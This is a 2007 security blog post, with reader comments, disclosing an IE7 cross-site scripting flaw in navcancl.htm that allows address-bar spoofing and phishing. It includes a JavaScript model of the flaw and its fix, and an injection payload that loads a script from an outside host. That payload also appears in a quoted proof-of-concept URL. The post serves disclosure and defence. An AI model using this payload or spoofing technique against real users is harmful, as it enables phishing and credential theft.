If at first you don't succeed; call it version 1.0
Wednesday, March 14, 2007

Summary
Internet Explorer 7.0 is vulnerable to cross-site scripting in one of its local resources. Combined with a design flaw in how IE7 displays the address of this local resource, this makes it easy for an attacker to conduct phishing attacks against IE7 users.

Affected versions
• Windows Vista - Internet Explorer 7.0
• Windows XP - Internet Explorer 7.0

Technical Details
The navcancl.htm local resource is displayed by the browser when a navigation to a specific page is canceled for some reason.
When a navigation is canceled, the URL of that page is passed to the navcancl.htm local resource after the # sign, for example: res://ieframe.dll/navcancl.htm#http://www.site.com. navcancl.htm then generates a script in the “Refresh the page.” link so that the provided site is loaded again when the user clicks the link.
Because the provided URL is placed inside that generated script, an attacker can embed script in the URL that breaks out of the generated script and executes when the user clicks the “Refresh the page.” link.
Luckily, Internet Explorer now runs most of its local resources (including navcancl.htm) in the “Internet Zone”, so this vulnerability cannot be exploited for remote code execution.

Unfortunately, there is also a design flaw in IE7: the browser strips the path of the local resource from the address bar and shows only the provided URL. For example, when the user visits res://ieframe.dll/navcancl.htm#http://www.site.com, IE7 shows http://www.site.com in the address bar.

To perform a phishing attack, an attacker crafts a navcancl.htm local resource link whose injected script displays fake content of a trusted site (e.g. a bank, PayPal, MySpace).
When the victim opens the link sent by the attacker, a “Navigation Canceled” page is displayed. The victim will assume the site or the network had an error and will try to refresh the page. Once the victim clicks the “Refresh the page.” link, the attacker's content (e.g. a fake login page) is displayed, and the victim believes he is on the trusted site because the address bar shows the trusted site's URL.
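As an added example (not code from this post, and not IE7's own navcancl.htm, whose markup the post does not show), the following Node-runnable JavaScript models the pattern described above: a refresh script built by splicing the URL after the # into a quoted string, the address-bar stripping, and a hardened builder that emits the URL as a proper string literal. The function names, the exact shape of the generated script and the stub window/document are assumptions; the payload is adapted from the proof-of-concept URL quoted in the comments below (with the percent-encoded space written literally).

```javascript
// Added example (not code from the post or from IE7): a model of the
// navcancl.htm pattern the post describes, the spoofed address bar, and a
// hardened link builder. The exact markup navcancl.htm generated is not shown
// in the post; the function bodies below are assumptions that reproduce the
// break-out seen in the proof-of-concept URL quoted in the comments.

const NAVCANCL_PREFIX = "res://ieframe.dll/navcancl.htm#";

// Payload adapted from the proof-of-concept URL quoted in the comments (the
// original percent-encoded the space in "<script src"). It closes the string
// and call around the URL, appends its own statement, and comments out the rest.
const PAYLOAD_URL =
  "http://www.cnn.com/dateandtime/andsomeotherpadding/tomakethislookslike/alegitimatelink.html?" +
  "\");document.write('<script src=\\'http://www.raffon.net/research/ms/ie/navcancl/phish.js\\'></script>');//";

// Vulnerable model (assumption): the URL taken from after '#' is spliced into
// the "Refresh the page." script as raw text inside a double-quoted string.
function buildRefreshScriptVulnerable(targetUrl) {
  return 'window.location.href = ("' + targetUrl + '");';
}

// Hardened model: emit the URL as a JavaScript string literal, so quotes,
// backslashes and line breaks are escaped, and also escape '<' so a
// "</script>" inside the URL cannot terminate an inline script element.
function jsStringLiteral(text) {
  return JSON.stringify(text).replace(/</g, "\\u003c");
}

function buildRefreshScriptHardened(targetUrl) {
  return "window.location.href = " + jsStringLiteral(targetUrl) + ";";
}

// Scheme allow-list for the refresh target. This blocks javascript: and other
// non-http targets but does NOT catch the payload: the payload is a
// well-formed http URL, so output escaping is still required.
function isAllowedRefreshTarget(targetUrl) {
  try {
    const u = new URL(targetUrl);
    return u.protocol === "http:" || u.protocol === "https:";
  } catch (e) {
    return false;
  }
}

// What IE7 showed in the address bar for such a link, per the post: the
// res:// path is dropped and only the text after '#' remains.
function addressBarDisplay(fullUrl) {
  const i = fullUrl.indexOf("#");
  if (fullUrl.startsWith("res://") && i !== -1) return fullUrl.slice(i + 1);
  return fullUrl;
}

// Simulate clicking "Refresh the page.": run the generated script against a
// stub window/document and record what it did.
function simulateClick(script) {
  const writes = [];
  const win = { location: { href: null } };
  const doc = { write: (markup) => writes.push(markup) };
  new Function("window", "document", script)(win, doc);
  return { navigatedTo: win.location.href, writes };
}

function demo() {
  const link = NAVCANCL_PREFIX + PAYLOAD_URL;
  const vulnerable = simulateClick(buildRefreshScriptVulnerable(PAYLOAD_URL));
  const hardened = simulateClick(buildRefreshScriptHardened(PAYLOAD_URL));
  return {
    addressBar: addressBarDisplay(link),          // starts with http://www.cnn.com/
    vulnerableWrites: vulnerable.writes,          // one document.write of the phish.js tag
    hardenedNavigatedTo: hardened.navigatedTo,    // the whole payload, inert, as the target
    hardenedWrites: hardened.writes,              // empty
  };
}

console.log(demo());
```

Run it with `node`. The vulnerable builder lets the payload's `document.write` run on click while the address bar model shows only the cnn.com prefix; the hardened builder keeps the entire payload inside the string literal, and the scheme check alone would have accepted the payload, which is why escaping, not validation, is the fix.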


Proof-of-Concept

A CNN.com article spoofing proof-of-concept can be found here.
If you are not using IE7, you can watch a demonstration video here.

Workaround / Suggestion
Until Microsoft fixes this vulnerability, do not trust the “Navigation Canceled” page!

Wednesday, March 14, 2007 11:47:09 AM UTC | Comments [20] | Security
Thursday, March 15, 2007 8:18:39 AM UTC
A phishing success with this trick is very improbable
Thursday, March 15, 2007 9:47:20 AM UTC
Why?
If people click on "Yes" buttons which install malware, why won't they click on a refresh link of an error page (with a trusted site URL in the address bar) and believe it's their trusted site?
Thursday, March 15, 2007 1:14:57 PM UTC
How can a site with this long URL I see in my IE7 URL bar be trusted???
"http://www.cnn.com/dateandtime/andsomeotherpadding/tomakethislookslike/alegitimatelink.html?");document"

And if I click on the URL bar I can also see this full URL:
"http://www.cnn.com/dateandtime/andsomeotherpadding/tomakethislookslike/alegitimatelink.html?");document.write('<script%20src=\'http://www.raffon.net/research/ms/ie/navcancl/phish.js\'></script>');//"

Sorry, but this phishing attack is very improbable!

Thursday, March 15, 2007 1:38:03 PM UTC
Usually people do not pay attention to the part of the URL that is not displayed within the visible address bar.
They will trust it if they see an acceptable domain name.
Thursday, March 15, 2007 4:34:27 PM UTC
Is it possible that you provide us the full source code?
I just want to try some things to verify this issue.

Enjoy,

Christian
Thursday, March 15, 2007 4:35:30 PM UTC
Do you really think this URL is acceptable?
"http://www.cnn.com/dateandtime/andsomeotherpadding/tomakethislookslike/alegitimatelink.html?");document"
ROTFL
Thursday, March 15, 2007 5:21:35 PM UTC
@Christian:
The proof-of-concept source code is public. The only thing that is not public is redc.aspx, which only redirects to the navcancl.htm local resource. Just use a sniffer (e.g. Fiddler) to grab the response's Location header.

@luc:
This was just an example. The phisher can use whatever URL prefix he wants.
Thursday, March 15, 2007 6:23:06 PM UTC
1. When the user clicks on that page he sees the page doesn't work, so he's alerted and I assume he pays attention to the URL and checks if that is correct.
2. The phisher has to write a long URL in order to hide the JavaScript code, but a long URL is always suspect; I'll never put my password in a crazy long URL.
3. The IE7 Antiphishing filter still continues to work and so that phishing site will be blocked by the antiphishing filter, although the page is spoofed.
So, there are a lot of things that make this attack's success very improbable.
Thursday, March 15, 2007 6:33:04 PM UTC
1. He will be alerted and will probably try to refresh the page as suggested by the browser.
2. A long URL is something trivial, and used by many trusted sites.
3. The Antiphishing tool will not work, as the page runs locally. Unless MS will flag the navcancl.htm local resource which is unlikely.
Thursday, March 15, 2007 8:01:39 PM UTC
You're wrong, the page runs in Internet zone and the phishing filter works!!!
Thursday, March 15, 2007 8:27:10 PM UTC
Indeed. Since IE6 SP2, all local resources run under the "Internet Zone". This is the reason, by the way, why this vulnerability cannot be exploited for remote code execution.
But, that doesn't mean MS will flag the navcancl.htm local resource, which in this case makes the Anti-Phishing tool useless.
Friday, March 16, 2007 8:48:57 AM UTC
The Anti-phishing filter verifies any http web site loaded in a page, and in your PoC this URL 'http://www.raffon.net/research/ms/ie/navcancl/phish.js' is checked by the Antiphishing filter.
Sunday, March 18, 2007 8:40:27 AM UTC
@casut:
My response for your last comment can be found here: http://aviv.raffon.net/2007/03/18/IE7AntiphishingToolAndExternalScripts.aspx
Wednesday, April 04, 2007 1:42:38 PM UTC
Hello

I'm very interested to know if this problem has been solved with a fix or an update provided by Microsoft.

Thanks
Friday, April 13, 2007 5:29:55 PM UTC
It's a fascinating attack. Does this also allow the spoofing of sites using the so-called Extended Validation certificate (the green address bar)?
Friday, July 20, 2007 9:16:21 AM UTC
Hi.
I'm searching for answers and solution for a problem in my pc, since some days ago.
When I start my browser (IE7 or Maxthon) with a configured group of 8 different pages, only two of them open normally; the other six pages return that screen with "Navigation to the website was canceled" and a single link to "Refresh the Page".
There is a strange separation between those two situations... the URLs of the two pages that can be seen are "https://..." and the blocked pages are all "http://..." pages!

Is this some kind of problem related to this?
And now, how can I fix this? I cannot navigate any more!!!
Please, can anyone who knows help me?

(Sorry for my poor English)
Best regards,
Milenio
Friday, July 20, 2007 10:38:38 AM UTC
You can find information about this issue on the IE team blog: http://blogs.msdn.com/ie/archive/2007/05/16/follow-up-to-internet-explorer-may-2007-security-update.aspx
Tuesday, July 24, 2007 5:52:50 AM UTC
Hi, I've recently had a problem running a hyperlink from a site I know I can trust. My Windows Vista HP Pavilion Entertainment PC's security system MIGHT BE canceling the page from showing up and it says the navigation to this webpage was canceled. My option then is refresh, but when I do, it says the program cannot display the webpage. Please give me some advice on how to fix this problem and be able to view this webpage!
Thanks.
Monday, July 14, 2008 9:24:26 AM UTC
Compose mail can't open in my Outlook Web Access; if I open it, a red mark simply appears. I'm using Windows Vista.
Wednesday, July 23, 2008 7:45:46 PM UTC
I have the same problem. I do a lot of business through Facebook and Myspace and now I can't use them. I know those are typical warning sites for phishing but I have no idea how to get these sites back without a proxy.
Disclaimer
The opinions expressed herein are my own personal opinions and do not represent my employer's view in anyway.